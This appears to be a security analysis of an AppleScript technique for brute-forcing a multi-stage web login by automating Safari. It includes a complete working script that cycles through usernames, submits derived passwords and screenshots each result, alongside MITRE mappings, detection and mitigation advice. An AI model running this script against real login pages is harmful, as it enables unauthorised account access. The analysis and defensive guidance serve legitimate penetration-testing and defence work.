Full Report
A long time ago I blogged on the joys of using VBS to automate brute-forcing [1|2] when one didn't want to mess about duplicating an application's functionality at the protocol level. Yesterday I had need to brute-force a web application which tried hard to be difficult and annoying. Normally I would have used crowbar, Suru or an ugly mangled Python script, but the application was strangely difficult, i.e. the login process is multi-staged, with new cookies being handed out at various stages. 302 redirects are used heavily, and then to top it off a healthy dose of JavaScript is sent back in replies that also affect your navigation. Now all of this can be scripted (obviously), but I figured I would try automating Safari with AppleScript to get the same effect.
Analysis Summary
# Tool/Technique: AppleScript for HTTP BruteForcing
## Overview
The technique described involves leveraging **AppleScript** to automate the Safari web browser in order to brute-force an HTTP web application login. The author chose this approach because the target application used a multi-staged login that handed out new cookies at several stages, relied heavily on 302 redirects, and returned JavaScript in its responses that affected navigation, all of which made protocol-level brute-forcing tools cumbersome to adapt. By automating the browser itself, the tester delegates cookie handling, redirect following and JavaScript execution to Safari instead of re-implementing them in a script.
## Technical Details
- Type: Tool (AppleScript interacting with Safari) / Technique (Browser Automation for Brute-Forcing)
- Platform: macOS (Requires Safari application)
- Capabilities: Automates form filling and submission, and offloads the awkward parts of the application logic (cookie juggling, redirects, server-returned JavaScript) to the browser.
- First Seen: The article was published on 01 January 2008.
## MITRE ATT&CK Mapping
This activity maps to the credential access phase; initial access follows only once a guessed credential succeeds.
- **TA0006 - Credential Access**
  - T1110 - Brute Force
  - T1110.001 - Password Guessing (each username in the list is tried with a password derived from it, e.g. `username+123`)
  - T1110.003 - Password Spraying (applies when the same derived pattern is tried across many accounts, which keeps each account under its lockout threshold)
- **TA0001 - Initial Access**
  - T1078 - Valid Accounts (a credential recovered this way is then used to log in as a legitimate user)
T1189 (Drive-by Compromise) does not apply: that technique describes victims loading attacker-controlled web content, whereas here the browser being automated is the attacker's own client.
## Functionality
### Core Capabilities
- **Browser Control:** Launches Safari and drives it from `tell application "Safari"` blocks (creating a document, setting its URL).
- **Form Interaction:** Uses Safari's `do JavaScript` command to run JavaScript in the page context, filling the login form fields and submitting the form.
- **Authentication Handling:** Because a real browser does the work, the multi-staged login, the cookies issued mid-flow, the 302 redirects and the server-returned JavaScript are all handled by Safari, which is simpler than reproducing the sequence at the HTTP level.
- **Iteration:** Loops over a list of usernames, attempting one login per entry.
### Advanced Features
- **Result Capture:** Screenshots the resulting page after the login attempt and saves it based on the username tested (e.g., `~/captures/XXXX.png`).
- **Data Handling Workaround:** Implemented a workaround for dictionary/associative array functionality (which was difficult to implement natively in AppleScript) by using a simple string delimited by a colon (`:`) for storing username/password pairs at runtime.
- **Password Generation:** Generated test passwords based on simple derivation (e.g., `username+123`).
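The following AppleScript is an added example written for this page; it is not the original SensePost script, and the target URL, the form element ids and the capture directory are assumed placeholders. It ties the capabilities above together: a colon-delimited string stands in for a dictionary of user:pass pairs (passwords derived as `username & "123"`), each pair is pushed through Safari via `do JavaScript`, and the resulting page is screenshotted to `~/captures/<username>.png`.

```applescript
-- Added example (not the original SensePost script): drive Safari through a
-- login form once per username, letting the browser handle the cookies, 302
-- redirects and server-sent JavaScript, then screenshot the result as
-- ~/captures/<username>.png. loginURL and the form element ids are assumed
-- placeholders; the password for each user is derived as username & "123".
property loginURL : "https://target.example/login"
property captureDir : missing value

set captureDir to (POSIX path of (path to home folder)) & "captures/"
do shell script "mkdir -p " & quoted form of captureDir

-- AppleScript has no native dictionary type, so, as in the original post,
-- keep user:pass pairs in a colon-delimited string, one pair per line.
-- The usernames below are constructed sample input.
set userList to {"alice", "bob", "carol"}
set pairs to ""
repeat with u in userList
	set pairs to pairs & (u as text) & ":" & (u as text) & "123" & linefeed
end repeat

repeat with aLine in paragraphs of pairs
	set aLine to aLine as text
	if aLine is not "" then
		set {theUser, thePass} to my splitOnColon(aLine)
		my attemptLogin(theUser, thePass)
	end if
end repeat

-- Split "user:pass" back into its two parts via text item delimiters.
on splitOnColon(s)
	set oldDelims to AppleScript's text item delimiters
	set AppleScript's text item delimiters to ":"
	set parts to text items of s
	set AppleScript's text item delimiters to oldDelims
	return {item 1 of parts, item 2 of parts}
end splitOnColon

-- Minimal JavaScript string literal; values containing quotes or
-- backslashes would need proper escaping before use.
on jsString(s)
	return "'" & s & "'"
end jsString

-- Poll the page until Safari reports it fully loaded.
on waitForLoad()
	tell application "Safari"
		repeat until (do JavaScript "document.readyState" in document 1) is "complete"
			delay 0.5
		end repeat
	end tell
end waitForLoad

on attemptLogin(theUser, thePass)
	tell application "Safari"
		activate
		if (count of documents) is 0 then make new document
		set URL of document 1 to loginURL
	end tell
	my waitForLoad()
	-- Fill and submit the form from inside the page context.
	set js to "document.getElementById('username').value=" & my jsString(theUser) & ";"
	set js to js & "document.getElementById('password').value=" & my jsString(thePass) & ";"
	set js to js & "document.forms[0].submit();"
	tell application "Safari" to do JavaScript js in document 1
	delay 2 -- let the redirect chain and any follow-up JavaScript settle
	my waitForLoad()
	-- Capture whatever the application showed, named after the username tested.
	do shell script "screencapture -x " & quoted form of (captureDir & theUser & ".png")
end attemptLogin
```

Run it from Script Editor or with `osascript login.applescript`. On Safari 11 and later, `do JavaScript` is refused until "Allow JavaScript from Apple Events" is ticked in the Develop menu. `screencapture` grabs the whole screen, so keep the Safari window frontmost; the one-image-per-username layout is what makes triage of a long run cheap, since the successful attempt is the thumbnail that looks different from all the others.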
## Indicators of Compromise
As this describes a custom operational technique rather than a piece of malware, only generic indicators can be given; from the target's side the traffic is hard to distinguish from a legitimate Safari user:
- File Hashes: N/A (custom, ephemeral script)
- File Names: On the operator's machine, per-attempt screenshots named after the tested username (e.g. `XXXX.png`) in a capture directory; nothing is written on the target.
- Registry Keys: N/A (macOS)
- Network Indicators: A burst of login requests to the target application from a single source IP, each carrying a genuine Safari User-Agent and completing the full multi-stage flow (cookies accepted, redirects followed, JavaScript executed), so checks that look for "non-browser" clients will not trip.
- Behavioral Indicators: High frequency of login attempts against one endpoint, many distinct usernames from one source in a short window, and a regular inter-attempt interval dictated by page-load time rather than human typing speed.
## Associated Threat Actors
This specific script was created by the author ("Haroon Meer" of SensePost) for a specific testing need. No known established threat actor groups are directly associated with this specific AppleScript tool, though the technique itself is common among penetration testers and adversaries alike.
## Detection Methods
- Signature-based detection: Not practical on the target side, since the requests are produced by an unmodified Safari. On the operator's host a signature would require the specific AppleScript to have been captured.
- Behavioral detection: On the web application, alert on login-attempt velocity per source IP and per account, on one source cycling through many usernames, and on the failed-login ratio relative to baseline. On a macOS endpoint, Apple Events driving Safari from `osascript` or Script Editor, combined with repeated `screencapture` invocations, is an unusual process pattern worth logging.
- YARA rules: Not applicable to the technique as such; a rule would only match a particular script that has already been collected.
## Mitigation Strategies
- **Prevention:** Apply rate limiting and progressive delays per account and per source, account lockout or step-up challenges after repeated failures, CAPTCHA, and multi-factor authentication on the login flow; reject trivially derived passwords such as `username+123` at password-set time.
- **Hardening Recommendations:** Do not rely on JavaScript challenges, cookie juggling or HTTP header checks as a brute-force defence; this technique exists precisely because a real browser satisfies all of them. Enforce limits server-side instead (per account, per source, per session), invalidate the session cookie chain when a login fails, and log every stage of the multi-step login so attempt velocity can be measured.
## Related Tools/Techniques
- **Crowbar:** Mentioned as the protocol-level brute-forcing tool the author would normally reach for.
- **Suru:** Mentioned as another tool the author would normally use for this kind of job.
- **VBScript automation:** The author's earlier approach of scripting an application with VBS and brute-forcing through it, rather than duplicating the application's functionality at the protocol level; the AppleScript/Safari approach is the macOS counterpart.
- **Selenium/Puppeteer/Playwright:** Modern cross-platform browser-automation frameworks that achieve the same effect (the browser handles cookies, redirects and JavaScript) and are the usual choice today for this kind of testing.